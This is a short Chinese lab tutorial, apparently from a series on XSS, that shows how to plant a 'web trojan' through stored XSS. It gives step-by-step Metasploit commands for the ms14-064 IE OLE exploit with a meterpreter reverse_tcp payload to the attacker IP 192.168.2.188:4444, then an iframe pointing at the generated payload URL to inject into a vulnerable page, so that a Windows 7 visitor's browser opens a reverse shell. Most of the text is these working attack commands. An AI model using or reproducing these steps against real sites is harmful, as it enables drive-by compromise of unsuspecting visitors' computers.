（八）XSS漏洞原理与利用_08网页挂马利用

存储型XSS利用:网页挂马


先利用MSF生成木马，把木马链接嵌入到网页中，当用户访问该页面加载执行木马，反弹shell。利用ms14-064洞生成木马。


攻击机:kali
客户机:存在漏洞的win7
网站运行:物理机
利用kaili生成木马
开启msf: msfconsole
搜索漏洞:search ms14-064
使用攻击模块:use
exploit/windows/browser/ms14 064 ole code execution
设置允许调用powershell:set AllowPowershellPrompt true
设置服务器(kaili lP):set SRVHOST 192.168.2.188
设置调用的payload:set payloadwindows/meterpreter/reverse tcp
设置监听IP(kali lP):set LHOST 192.168.2.188
设置监听端口:set LPORT 4444
开启攻击:run 或者 exploit
生成木马: http://192.168.2.188:8080/DbvIRPd






把URL地址嵌入js代码中，嵌入网页中，等待客户端访问网页!
<iframe
src="http://192.168.2.188:8080/DbvlRPd"></iframe>





win7客户机使用IE浏览器访问存在xss漏洞的
页面:





kali机上收到反弹的会话